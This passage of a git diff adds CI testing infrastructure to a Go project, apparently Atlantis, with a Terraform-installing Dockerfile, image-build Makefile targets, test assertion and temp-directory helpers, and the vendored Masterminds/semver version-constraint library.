// Start begins the testdrive process.
// nolint: errcheck
diff --git a/testing/Dockerfile b/testing/Dockerfile
new file mode 100644
index 0000000000..b52eb89868
--- /dev/null
+++ b/testing/Dockerfile
@@ -0,0 +1,12 @@
+# This Dockerfile builds the docker image used for running circle ci tests.
+# We need terraform installed for our full test suite so it installs that.
+# It's updated by running make build-testing-image
+FROM circleci/golang:1.10
+
+# Install Terraform
+ENV TERRAFORM_VERSION=0.11.7
+RUN curl -LOks https://releases.hashicorp.com/terraform/${TERRAFORM_VERSION}/terraform_${TERRAFORM_VERSION}_linux_amd64.zip && \
+ sudo mkdir -p /usr/local/bin/tf/versions/${TERRAFORM_VERSION} && \
+ sudo unzip terraform_${TERRAFORM_VERSION}_linux_amd64.zip -d /usr/local/bin/tf/versions/${TERRAFORM_VERSION} && \
+ sudo ln -s /usr/local/bin/tf/versions/${TERRAFORM_VERSION}/terraform /usr/local/bin/terraform && \
+ rm terraform_${TERRAFORM_VERSION}_linux_amd64.zip
diff --git a/testing/Makefile b/testing/Makefile
new file mode 100644
index 0000000000..49a5387eca
--- /dev/null
+++ b/testing/Makefile
@@ -0,0 +1,11 @@
+TEST_IMAGE_NAME := runatlantis/testing-env
+
+.DEFAULT_GOAL := help
+help: ## List targets & descriptions
+ @cat Makefile* | grep -E '^[a-zA-Z_-]+:.*?## .*$$' | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-30s\033[0m %s\n", $$1, $$2}'
+
+build-testing-image: ## Build and push the testing image
+ docker build -t $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) .
+ docker tag $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) $(TEST_IMAGE_NAME):latest
+ docker push $(TEST_IMAGE_NAME):$$(git rev-parse HEAD)
+ docker push $(TEST_IMAGE_NAME):latest
diff --git a/testing/assertions.go b/testing/assertions.go
index cd5bf3ba5b..d66266824e 100644
--- a/testing/assertions.go
+++ b/testing/assertions.go
@@ -16,9 +16,12 @@ package testing
import (
"fmt"
"path/filepath"
- "reflect"
"runtime"
+ "strings"
"testing"
+
+ "github.com/davecgh/go-spew/spew"
+ "github.com/go-test/deep"
)
// Assert fails the test if the condition is false.
@@ -44,10 +47,10 @@ func Ok(tb testing.TB, err error) {
// Equals fails the test if exp is not equal to act.
// Taken from https://github.com/benbjohnson/testing.
func Equals(tb testing.TB, exp, act interface{}) {
- if !reflect.DeepEqual(exp, act) {
+ tb.Helper()
+ if diff := deep.Equal(exp, act); diff != nil {
_, file, line, _ := runtime.Caller(1)
- fmt.Printf("\033[31m%s:%d:\n\n\texp: %#v\n\n\tgot: %#v\033[39m\n\n", filepath.Base(file), line, exp, act)
- tb.FailNow()
+ tb.Fatalf("\033[31m%s:%d: %s\n\nexp: %s******\ngot: %s\033[39m\n", filepath.Base(file), line, diff, spew.Sdump(exp), spew.Sdump(act))
}
}
@@ -55,10 +58,22 @@ func Equals(tb testing.TB, exp, act interface{}) {
func ErrEquals(tb testing.TB, exp string, act error) {
tb.Helper()
if act == nil {
- tb.Errorf("exp err %q but err was nil", exp)
+ tb.Fatalf("exp err %q but err was nil\n", exp)
}
if act.Error() != exp {
- tb.Errorf("exp err: %q but got: %q", exp, act.Error())
+ tb.Fatalf("exp err: %q but got: %q\n", exp, act.Error())
+ }
+}
+
+// ErrContains fails the test if act is nil or act.Error() does not contain
+// substr.
+func ErrContains(tb testing.TB, substr string, act error) {
+ tb.Helper()
+ if act == nil {
+ tb.Fatalf("exp err to contain %q but err was nil", substr)
+ }
+ if !strings.Contains(act.Error(), substr) {
+ tb.Fatalf("exp err %q to contain %q", act.Error(), substr)
}
}
diff --git a/testing/temp_files.go b/testing/temp_files.go
new file mode 100644
index 0000000000..7a242010f2
--- /dev/null
+++ b/testing/temp_files.go
@@ -0,0 +1,43 @@
+package testing
+
+import (
+ "io/ioutil"
+ "os"
+ "path/filepath"
+ "testing"
+)
+
+// TempDir creates a temporary directory and returns its path along
+// with a cleanup function to be called via defer, ex:
+// dir, cleanup := TempDir()
+// defer cleanup()
+func TempDir(t *testing.T) (string, func()) {
+ tmpDir, err := ioutil.TempDir("", "")
+ Ok(t, err)
+ return tmpDir, func() {
+ os.RemoveAll(tmpDir) // nolint: errcheck
+ }
+}
+func DirStructure(t *testing.T, structure map[string]interface{}) (string, func()) {
+ tmpDir, cleanup := TempDir(t)
+ dirStructureGo(t, tmpDir, structure)
+ return tmpDir, cleanup
+}
+
+func dirStructureGo(t *testing.T, parentDir string, structure map[string]interface{}) {
+ for key, val := range structure {
+ // If val is nil then key is a filename and we just create it
+ if val == nil {
+ _, err := os.Create(filepath.Join(parentDir, key))
+ Ok(t, err)
+ continue
+ }
+ // If val is another map then key is a dir
+ if dirContents, ok := val.(map[string]interface{}); ok {
+ subDir := filepath.Join(parentDir, key)
+ Ok(t, os.Mkdir(subDir, 0700))
+ // Recurse and create contents.
+ dirStructureGo(t, subDir, dirContents)
+ }
+ }
+}
diff --git a/vendor/github.com/Masterminds/semver/.travis.yml b/vendor/github.com/Masterminds/semver/.travis.yml
new file mode 100644
index 0000000000..3d9ebadb93
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/.travis.yml
@@ -0,0 +1,27 @@
+language: go
+
+go:
+ - 1.6.x
+ - 1.7.x
+ - 1.8.x
+ - 1.9.x
+ - 1.10.x
+ - tip
+
+# Setting sudo access to false will let Travis CI use containers rather than
+# VMs to run the tests. For more details see:
+# - http://docs.travis-ci.com/user/workers/container-based-infrastructure/
+# - http://docs.travis-ci.com/user/workers/standard-infrastructure/
+sudo: false
+
+script:
+ - make setup
+ - make test
+
+notifications:
+ webhooks:
+ urls:
+ - https://webhooks.gitter.im/e/06e3328629952dabe3e0
+ on_success: change # options: [always|never|change] default: always
+ on_failure: always # options: [always|never|change] default: always
+ on_start: never # options: [always|never|change] default: always
diff --git a/vendor/github.com/Masterminds/semver/CHANGELOG.md b/vendor/github.com/Masterminds/semver/CHANGELOG.md
new file mode 100644
index 0000000000..b888e20aba
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/CHANGELOG.md
@@ -0,0 +1,86 @@
+# 1.4.2 (2018-04-10)
+
+## Changed
+- #72: Updated the docs to point to vert for a console appliaction
+- #71: Update the docs on pre-release comparator handling
+
+## Fixed
+- #70: Fix the handling of pre-releases and the 0.0.0 release edge case
+
+# 1.4.1 (2018-04-02)
+
+## Fixed
+- Fixed #64: Fix pre-release precedence issue (thanks @uudashr)
+
+# 1.4.0 (2017-10-04)
+
+## Changed
+- #61: Update NewVersion to parse ints with a 64bit int size (thanks @zknill)
+
+# 1.3.1 (2017-07-10)
+
+## Fixed
+- Fixed #57: number comparisons in prerelease sometimes inaccurate
+
+# 1.3.0 (2017-05-02)
+
+## Added
+- #45: Added json (un)marshaling support (thanks @mh-cbon)
+- Stability marker. See https://masterminds.github.io/stability/
+
+## Fixed
+- #51: Fix handling of single digit tilde constraint (thanks @dgodd)
+
+## Changed
+- #55: The godoc icon moved from png to svg
+
+# 1.2.3 (2017-04-03)
+
+## Fixed
+- #46: Fixed 0.x.x and 0.0.x in constraints being treated as *
+
+# Release 1.2.2 (2016-12-13)
+
+## Fixed
+- #34: Fixed issue where hyphen range was not working with pre-release parsing.
+
+# Release 1.2.1 (2016-11-28)
+
+## Fixed
+- #24: Fixed edge case issue where constraint "> 0" does not handle "0.0.1-alpha"
+ properly.
+
+# Release 1.2.0 (2016-11-04)
+
+## Added
+- #20: Added MustParse function for versions (thanks @adamreese)
+- #15: Added increment methods on versions (thanks @mh-cbon)
+
+## Fixed
+- Issue #21: Per the SemVer spec (section 9) a pre-release is unstable and
+ might not satisfy the intended compatibility. The change here ignores pre-releases
+ on constraint checks (e.g., ~ or ^) when a pre-release is not part of the
+ constraint. For example, `^1.2.3` will ignore pre-releases while
+ `^1.2.3-alpha` will include them.
+
+# Release 1.1.1 (2016-06-30)
+
+## Changed
+- Issue #9: Speed up version comparison performance (thanks @sdboyer)
+- Issue #8: Added benchmarks (thanks @sdboyer)
+- Updated Go Report Card URL to new location
+- Updated Readme to add code snippet formatting (thanks @mh-cbon)
+- Updating tagging to v[SemVer] structure for compatibility with other tools.
+
+# Release 1.1.0 (2016-03-11)
+
+- Issue #2: Implemented validation to provide reasons a versions failed a
+ constraint.
+
+# Release 1.0.1 (2015-12-31)
+
+- Fixed #1: * constraint failing on valid versions.
+
+# Release 1.0.0 (2015-10-20)
+
+- Initial release
diff --git a/vendor/github.com/Masterminds/semver/LICENSE.txt b/vendor/github.com/Masterminds/semver/LICENSE.txt
new file mode 100644
index 0000000000..0da4aeadb0
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/LICENSE.txt
@@ -0,0 +1,20 @@
+The Masterminds
+Copyright (C) 2014-2015, Matt Butcher and Matt Farina
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.
diff --git a/vendor/github.com/Masterminds/semver/Makefile b/vendor/github.com/Masterminds/semver/Makefile
new file mode 100644
index 0000000000..a7a1b4e36d
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/Makefile
@@ -0,0 +1,36 @@
+.PHONY: setup
+setup:
+ go get -u gopkg.in/alecthomas/gometalinter.v1
+ gometalinter.v1 --install
+
+.PHONY: test
+test: validate lint
+ @echo "==> Running tests"
+ go test -v
+
+.PHONY: validate
+validate:
+ @echo "==> Running static validations"
+ @gometalinter.v1 \
+ --disable-all \
+ --enable deadcode \
+ --severity deadcode:error \
+ --enable gofmt \
+ --enable gosimple \
+ --enable ineffassign \
+ --enable misspell \
+ --enable vet \
+ --tests \
+ --vendor \
+ --deadline 60s \
+ ./... || exit_code=1
+
+.PHONY: lint
+lint:
+ @echo "==> Running linters"
+ @gometalinter.v1 \
+ --disable-all \
+ --enable golint \
+ --vendor \
+ --deadline 60s \
+ ./... || :
diff --git a/vendor/github.com/Masterminds/semver/README.md b/vendor/github.com/Masterminds/semver/README.md
new file mode 100644
index 0000000000..3e934ed71e
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/README.md
@@ -0,0 +1,165 @@
+# SemVer
+
+The `semver` package provides the ability to work with [Semantic Versions](http://semver.org) in Go. Specifically it provides the ability to:
+
+* Parse semantic versions
+* Sort semantic versions
+* Check if a semantic version fits within a set of constraints
+* Optionally work with a `v` prefix
+
+[![Stability:
+Active](https://masterminds.github.io/stability/active.svg)](https://masterminds.github.io/stability/active.html)
+[![Build Status](https://travis-ci.org/Masterminds/semver.svg)](https://travis-ci.org/Masterminds/semver) [![Build status](https://ci.appveyor.com/api/projects/status/jfk66lib7hb985k8/branch/master?svg=true&passingText=windows%20build%20passing&failingText=windows%20build%20failing)](https://ci.appveyor.com/project/mattfarina/semver/branch/master) [![GoDoc](https://godoc.org/github.com/Masterminds/semver?status.svg)](https://godoc.org/github.com/Masterminds/semver) [![Go Report Card](https://goreportcard.com/badge/github.com/Masterminds/semver)](https://goreportcard.com/report/github.com/Masterminds/semver)
+
+## Parsing Semantic Versions
+
+To parse a semantic version use the `NewVersion` function. For example,
+
+```go
+ v, err := semver.NewVersion("1.2.3-beta.1+build345")
+```
+
+If there is an error the version wasn't parseable. The version object has methods
+to get the parts of the version, compare it to other versions, convert the
+version back into a string, and get the original string. For more details
+please see the [documentation](https://godoc.org/github.com/Masterminds/semver).
+
+## Sorting Semantic Versions
+
+A set of versions can be sorted using the [`sort`](https://golang.org/pkg/sort/)
+package from the standard library. For example,
+
+```go
+ raw := []string{"1.2.3", "1.0", "1.3", "2", "0.4.2",}
+ vs := make([]*semver.Version, len(raw))
+ for i, r := range raw {
+ v, err := semver.NewVersion(r)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ vs[i] = v
+ }
+
+ sort.Sort(semver.Collection(vs))
+```
+
+## Checking Version Constraints
+
+Checking a version against version constraints is one of the most featureful
+parts of the package.
+
+```go
+ c, err := semver.NewConstraint(">= 1.2.3")
+ if err != nil {
+ // Handle constraint not being parseable.
+ }
+
+ v, _ := semver.NewVersion("1.3")
+ if err != nil {
+ // Handle version not being parseable.
+ }
+ // Check if the version meets the constraints. The a variable will be true.
+ a := c.Check(v)
+```
+
+## Basic Comparisons
+
+There are two elements to the comparisons. First, a comparison string is a list
+of comma separated and comparisons. These are then separated by || separated or
+comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a
+comparison that's greater than or equal to 1.2 and less than 3.0.0 or is
+greater than or equal to 4.2.3.
+
+The basic comparisons are:
+
+* `=`: equal (aliased to no operator)
+* `!=`: not equal
+* `>`: greater than
+* `<`: less than
+* `>=`: greater than or equal to
+* `<=`: less than or equal to
+
+_Note, according to the Semantic Version specification pre-releases may not be
+API compliant with their release counterpart. It says,_
+
+> _A pre-release version indicates that the version is unstable and might not satisfy the intended compatibility requirements as denoted by its associated normal version._
+
+_SemVer comparisons without a pre-release value will skip pre-release versions.
+For example, `>1.2.3` will skip pre-releases when looking at a list of values
+while `>1.2.3-alpha.1` will evaluate pre-releases._
+
+## Hyphen Range Comparisons
+
+There are multiple methods to handle ranges and the first is hyphens ranges.
+These look like:
+
+* `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5`
+* `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5`
+
+## Wildcards In Comparisons
+
+The `x`, `X`, and `*` characters can be used as a wildcard character. This works
+for all comparison operators. When used on the `=` operator it falls
+back to the pack level comparison (see tilde below). For example,
+
+* `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `>= 1.2.x` is equivalent to `>= 1.2.0`
+* `<= 2.x` is equivalent to `<= 3`
+* `*` is equivalent to `>= 0.0.0`
+
+## Tilde Range Comparisons (Patch)
+
+The tilde (`~`) comparison operator is for patch level ranges when a minor
+version is specified and major level changes when the minor number is missing.
+For example,
+
+* `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0`
+* `~1` is equivalent to `>= 1, < 2`
+* `~2.3` is equivalent to `>= 2.3, < 2.4`
+* `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `~1.x` is equivalent to `>= 1, < 2`
+
+## Caret Range Comparisons (Major)
+
+The caret (`^`) comparison operator is for major level changes. This is useful
+when comparisons of API versions as a major change is API breaking. For example,
+
+* `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0`
+* `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0`
+* `^2.3` is equivalent to `>= 2.3, < 3`
+* `^2.x` is equivalent to `>= 2.0.0, < 3`
+
+# Validation
+
+In addition to testing a version against a constraint, a version can be validated
+against a constraint. When validation fails a slice of errors containing why a
+version didn't meet the constraint is returned. For example,
+
+```go
+ c, err := semver.NewConstraint("<= 1.2.3, >= 1.4")
+ if err != nil {
+ // Handle constraint not being parseable.
+ }
+
+ v, _ := semver.NewVersion("1.3")
+ if err != nil {
+ // Handle version not being parseable.
+ }
+
+ // Validate a version against a constraint.
+ a, msgs := c.Validate(v)
+ // a is false
+ for _, m := range msgs {
+ fmt.Println(m)
+
+ // Loops over the errors which would read
+ // "1.3 is greater than 1.2.3"
+ // "1.3 is less than 1.4"
+ }
+```
+
+# Contribute
+
+If you find an issue or want to contribute please file an [issue](https://github.com/Masterminds/semver/issues)
+or [create a pull request](https://github.com/Masterminds/semver/pulls).
diff --git a/vendor/github.com/Masterminds/semver/appveyor.yml b/vendor/github.com/Masterminds/semver/appveyor.yml
new file mode 100644
index 0000000000..b2778df15a
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/appveyor.yml
@@ -0,0 +1,44 @@
+version: build-{build}.{branch}
+
+clone_folder: C:\gopath\src\github.com\Masterminds\semver
+shallow_clone: true
+
+environment:
+ GOPATH: C:\gopath
+
+platform:
+ - x64
+
+install:
+ - go version
+ - go env
+ - go get -u gopkg.in/alecthomas/gometalinter.v1
+ - set PATH=%PATH%;%GOPATH%\bin
+ - gometalinter.v1.exe --install
+
+build_script:
+ - go install -v ./...
+
+test_script:
+ - "gometalinter.v1 \
+ --disable-all \
+ --enable deadcode \
+ --severity deadcode:error \
+ --enable gofmt \
+ --enable gosimple \
+ --enable ineffassign \
+ --enable misspell \
+ --enable vet \
+ --tests \
+ --vendor \
+ --deadline 60s \
+ ./... || exit_code=1"
+ - "gometalinter.v1 \
+ --disable-all \
+ --enable golint \
+ --vendor \
+ --deadline 60s \
+ ./... || :"
+ - go test -v
+
+deploy: off
diff --git a/vendor/github.com/Masterminds/semver/benchmark_test.go b/vendor/github.com/Masterminds/semver/benchmark_test.go
new file mode 100644
index 0000000000..58a5c289f4
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/benchmark_test.go
@@ -0,0 +1,157 @@
+package semver_test
+
+import (
+ "testing"
+
+ "github.com/Masterminds/semver"
+)
+
+/* Constraint creation benchmarks */
+
+func benchNewConstraint(c string, b *testing.B) {
+ for i := 0; i < b.N; i++ {
+ semver.NewConstraint(c)
+ }
+}
+
+func BenchmarkNewConstraintUnary(b *testing.B) {
+ benchNewConstraint("=2.0", b)
+}
+
+func BenchmarkNewConstraintTilde(b *testing.B) {
+ benchNewConstraint("~2.0.0", b)
+}
+
+func BenchmarkNewConstraintCaret(b *testing.B) {
+ benchNewConstraint("^2.0.0", b)
+}
+
+func BenchmarkNewConstraintWildcard(b *testing.B) {
+ benchNewConstraint("1.x", b)
+}
+
+func BenchmarkNewConstraintRange(b *testing.B) {
+ benchNewConstraint(">=2.1.x, <3.1.0", b)
+}
+
+func BenchmarkNewConstraintUnion(b *testing.B) {
+ benchNewConstraint("~2.0.0 || =3.1.0", b)
+}
+
+/* Check benchmarks */
+
+func benchCheckVersion(c, v string, b *testing.B) {
+ version, _ := semver.NewVersion(v)
+ constraint, _ := semver.NewConstraint(c)
+
+ for i := 0; i < b.N; i++ {
+ constraint.Check(version)
+ }
+}
+
+func BenchmarkCheckVersionUnary(b *testing.B) {
+ benchCheckVersion("=2.0", "2.0.0", b)
+}
+
+func BenchmarkCheckVersionTilde(b *testing.B) {
+ benchCheckVersion("~2.0.0", "2.0.5", b)
+}
+
+func BenchmarkCheckVersionCaret(b *testing.B) {
+ benchCheckVersion("^2.0.0", "2.1.0", b)
+}
+
+func BenchmarkCheckVersionWildcard(b *testing.B) {
+ benchCheckVersion("1.x", "1.4.0", b)
+}
+
+func BenchmarkCheckVersionRange(b *testing.B) {
+ benchCheckVersion(">=2.1.x, <3.1.0", "2.4.5", b)
+}
+
+func BenchmarkCheckVersionUnion(b *testing.B) {
+ benchCheckVersion("~2.0.0 || =3.1.0", "3.1.0", b)
+}
+
+func benchValidateVersion(c, v string, b *testing.B) {
+ version, _ := semver.NewVersion(v)
+ constraint, _ := semver.NewConstraint(c)
+
+ for i := 0; i < b.N; i++ {
+ constraint.Validate(version)
+ }
+}
+
+/* Validate benchmarks, including fails */
+
+func BenchmarkValidateVersionUnary(b *testing.B) {
+ benchValidateVersion("=2.0", "2.0.0", b)
+}
+
+func BenchmarkValidateVersionUnaryFail(b *testing.B) {
+ benchValidateVersion("=2.0", "2.0.1", b)
+}
+
+func BenchmarkValidateVersionTilde(b *testing.B) {
+ benchValidateVersion("~2.0.0", "2.0.5", b)
+}
+
+func BenchmarkValidateVersionTildeFail(b *testing.B) {
+ benchValidateVersion("~2.0.0", "1.0.5", b)
+}
+
+func BenchmarkValidateVersionCaret(b *testing.B) {
+ benchValidateVersion("^2.0.0", "2.1.0", b)
+}
+
+func BenchmarkValidateVersionCaretFail(b *testing.B) {
+ benchValidateVersion("^2.0.0", "4.1.0", b)
+}
+
+func BenchmarkValidateVersionWildcard(b *testing.B) {
+ benchValidateVersion("1.x", "1.4.0", b)
+}
+
+func BenchmarkValidateVersionWildcardFail(b *testing.B) {
+ benchValidateVersion("1.x", "2.4.0", b)
+}
+
+func BenchmarkValidateVersionRange(b *testing.B) {
+ benchValidateVersion(">=2.1.x, <3.1.0", "2.4.5", b)
+}
+
+func BenchmarkValidateVersionRangeFail(b *testing.B) {
+ benchValidateVersion(">=2.1.x, <3.1.0", "1.4.5", b)
+}
+
+func BenchmarkValidateVersionUnion(b *testing.B) {
+ benchValidateVersion("~2.0.0 || =3.1.0", "3.1.0", b)
+}
+
+func BenchmarkValidateVersionUnionFail(b *testing.B) {
+ benchValidateVersion("~2.0.0 || =3.1.0", "3.1.1", b)
+}
+
+/* Version creation benchmarks */
+
+func benchNewVersion(v string, b *testing.B) {
+ for i := 0; i < b.N; i++ {
+ semver.NewVersion(v)
+ }
+}
+
+func BenchmarkNewVersionSimple(b *testing.B) {
+ benchNewVersion("1.0.0", b)
+}
+
+func BenchmarkNewVersionPre(b *testing.B) {
+ benchNewVersion("1.0.0-alpha", b)
+}
+
+func BenchmarkNewVersionMeta(b *testing.B) {
+ benchNewVersion("1.0.0+metadata", b)
+}
+
+func BenchmarkNewVersionMetaDash(b *testing.B) {
+ benchNewVersion("1.0.0+metadata-dash", b)
+}
diff --git a/vendor/github.com/Masterminds/semver/collection.go b/vendor/github.com/Masterminds/semver/collection.go
new file mode 100644
index 0000000000..a78235895f
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/collection.go
@@ -0,0 +1,24 @@
+package semver
+
+// Collection is a collection of Version instances and implements the sort
+// interface. See the sort package for more details.
+// https://golang.org/pkg/sort/
+type Collection []*Version
+
+// Len returns the length of a collection. The number of Version instances
+// on the slice.
+func (c Collection) Len() int {
+ return len(c)
+}
+
+// Less is needed for the sort interface to compare two Version objects on the
+// slice. If checks if one is less than the other.
+func (c Collection) Less(i, j int) bool {
+ return c[i].LessThan(c[j])
+}
+
+// Swap is needed for the sort interface to replace the Version objects
+// at two different positions in the slice.
+func (c Collection) Swap(i, j int) {
+ c[i], c[j] = c[j], c[i]
+}
diff --git a/vendor/github.com/Masterminds/semver/collection_test.go b/vendor/github.com/Masterminds/semver/collection_test.go
new file mode 100644
index 0000000000..71b909c4e0
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/collection_test.go
@@ -0,0 +1,46 @@
+package semver
+
+import (
+ "reflect"
+ "sort"
+ "testing"
+)
+
+func TestCollection(t *testing.T) {
+ raw := []string{
+ "1.2.3",
+ "1.0",
+ "1.3",
+ "2",
+ "0.4.2",
+ }
+
+ vs := make([]*Version, len(raw))
+ for i, r := range raw {
+ v, err := NewVersion(r)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ vs[i] = v
+ }
+
+ sort.Sort(Collection(vs))
+
+ e := []string{
+ "0.4.2",
+ "1.0.0",
+ "1.2.3",
+ "1.3.0",
+ "2.0.0",
+ }
+
+ a := make([]string, len(vs))
+ for i, v := range vs {
+ a[i] = v.String()
+ }
+
+ if !reflect.DeepEqual(a, e) {
+ t.Error("Sorting Collection failed")
+ }
+}
diff --git a/vendor/github.com/Masterminds/semver/constraints.go b/vendor/github.com/Masterminds/semver/constraints.go
new file mode 100644
index 0000000000..a41a6a7a4a
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/constraints.go
@@ -0,0 +1,426 @@
+package semver
+
+import (
+ "errors"
+ "fmt"
+ "regexp"
+ "strings"
+)
+
+// Constraints is one or more constraint that a semantic version can be
+// checked against.
+type Constraints struct {
+ constraints [][]*constraint
+}
+
+// NewConstraint returns a Constraints instance that a Version instance can
+// be checked against. If there is a parse error it will be returned.
+func NewConstraint(c string) (*Constraints, error) {
+
+ // Rewrite - ranges into a comparison operation.
+ c = rewriteRange(c)
+
+ ors := strings.Split(c, "||")
+ or := make([][]*constraint, len(ors))
+ for k, v := range ors {
+ cs := strings.Split(v, ",")
+ result := make([]*constraint, len(cs))
+ for i, s := range cs {
+ pc, err := parseConstraint(s)
+ if err != nil {
+ return nil, err
+ }
+
+ result[i] = pc
+ }
+ or[k] = result
+ }
+
+ o := &Constraints{constraints: or}
+ return o, nil
+}
+
+// Check tests if a version satisfies the constraints.
+func (cs Constraints) Check(v *Version) bool {
+ // loop over the ORs and check the inner ANDs
+ for _, o := range cs.constraints {
+ joy := true
+ for _, c := range o {
+ if !c.check(v) {
+ joy = false
+ break
+ }
+ }
+
+ if joy {
+ return true
+ }
+ }
+
+ return false
+}
+
+// Validate checks if a version satisfies a constraint. If not a slice of
+// reasons for the failure are returned in addition to a bool.
+func (cs Constraints) Validate(v *Version) (bool, []error) {
+ // loop over the ORs and check the inner ANDs
+ var e []error
+ for _, o := range cs.constraints {
+ joy := true
+ for _, c := range o {
+ if !c.check(v) {
+ em := fmt.Errorf(c.msg, v, c.orig)
+ e = append(e, em)
+ joy = false
+ }
+ }
+
+ if joy {
+ return true, []error{}
+ }
+ }
+
+ return false, e
+}
+
+var constraintOps map[string]cfunc
+var constraintMsg map[string]string
+var constraintRegex *regexp.Regexp
+
+func init() {
+ constraintOps = map[string]cfunc{
+ "": constraintTildeOrEqual,
+ "=": constraintTildeOrEqual,
+ "!=": constraintNotEqual,
+ ">": constraintGreaterThan,
+ "<": constraintLessThan,
+ ">=": constraintGreaterThanEqual,
+ "=>": constraintGreaterThanEqual,
+ "<=": constraintLessThanEqual,
+ "=<": constraintLessThanEqual,
+ "~": constraintTilde,
+ "~>": constraintTilde,
+ "^": constraintCaret,
+ }
+
+ constraintMsg = map[string]string{
+ "": "%s is not equal to %s",
+ "=": "%s is not equal to %s",
+ "!=": "%s is equal to %s",
+ ">": "%s is less than or equal to %s",
+ "<": "%s is greater than or equal to %s",
+ ">=": "%s is less than %s",
+ "=>": "%s is less than %s",
+ "<=": "%s is greater than %s",
+ "=<": "%s is greater than %s",
+ "~": "%s does not have same major and minor version as %s",
+ "~>": "%s does not have same major and minor version as %s",
+ "^": "%s does not have same major version as %s",
+ }
+
+ ops := make([]string, 0, len(constraintOps))
+ for k := range constraintOps {
+ ops = append(ops, regexp.QuoteMeta(k))
+ }
+
+ constraintRegex = regexp.MustCompile(fmt.Sprintf(
+ `^\s*(%s)\s*(%s)\s*$`,
+ strings.Join(ops, "|"),
+ cvRegex))
+
+ constraintRangeRegex = regexp.MustCompile(fmt.Sprintf(
+ `\s*(%s)\s+-\s+(%s)\s*`,
+ cvRegex, cvRegex))
+}
+
+// An individual constraint
+type constraint struct {
+ // The callback function for the restraint. It performs the logic for
+ // the constraint.
+ function cfunc
+
+ msg string
+
+ // The version used in the constraint check. For example, if a constraint
+ // is '<= 2.0.0' the con a version instance representing 2.0.0.
+ con *Version
+
+ // The original parsed version (e.g., 4.x from != 4.x)
+ orig string
+
+ // When an x is used as part of the version (e.g., 1.x)
+ minorDirty bool
+ dirty bool
+ patchDirty bool
+}
+
+// Check if a version meets the constraint
+func (c *constraint) check(v *Version) bool {
+ return c.function(v, c)
+}
+
+type cfunc func(v *Version, c *constraint) bool
+
+func parseConstraint(c string) (*constraint, error) {
+ m := constraintRegex.FindStringSubmatch(c)
+ if m == nil {
+ return nil, fmt.Errorf("improper constraint: %s", c)
+ }
+
+ ver := m[2]
+ orig := ver
+ minorDirty := false
+ patchDirty := false
+ dirty := false
+ if isX(m[3]) {
+ ver = "0.0.0"
+ dirty = true
+ } else if isX(strings.TrimPrefix(m[4], ".")) || m[4] == "" {
+ minorDirty = true
+ dirty = true
+ ver = fmt.Sprintf("%s.0.0%s", m[3], m[6])
+ } else if isX(strings.TrimPrefix(m[5], ".")) {
+ dirty = true
+ patchDirty = true
+ ver = fmt.Sprintf("%s%s.0%s", m[3], m[4], m[6])
+ }
+
+ con, err := NewVersion(ver)
+ if err != nil {
+
+ // The constraintRegex should catch any regex parsing errors. So,
+ // we should never get here.
+ return nil, errors.New("constraint Parser Error")
+ }
+
+ cs := &constraint{
+ function: constraintOps[m[1]],
+ msg: constraintMsg[m[1]],
+ con: con,
+ orig: orig,
+ minorDirty: minorDirty,
+ patchDirty: patchDirty,
+ dirty: dirty,
+ }
+ return cs, nil
+}
+
+// Constraint functions
+func constraintNotEqual(v *Version, c *constraint) bool {
+ if c.dirty {
+
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if c.con.Major() != v.Major() {
+ return true
+ }
+ if c.con.Minor() != v.Minor() && !c.minorDirty {
+ return true
+ } else if c.minorDirty {
+ return false
+ }
+
+ return false
+ }
+
+ return !v.Equal(c.con)
+}
+
+func constraintGreaterThan(v *Version, c *constraint) bool {
+
+ // An edge case the constraint is 0.0.0 and the version is 0.0.0-someprerelease
+ // exists. This that case.
+ if !isNonZero(c.con) && isNonZero(v) {
+ return true
+ }
+
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ return v.Compare(c.con) == 1
+}
+
+func constraintLessThan(v *Version, c *constraint) bool {
+ // If there is a pre-release on the version but the constraint isn't looking
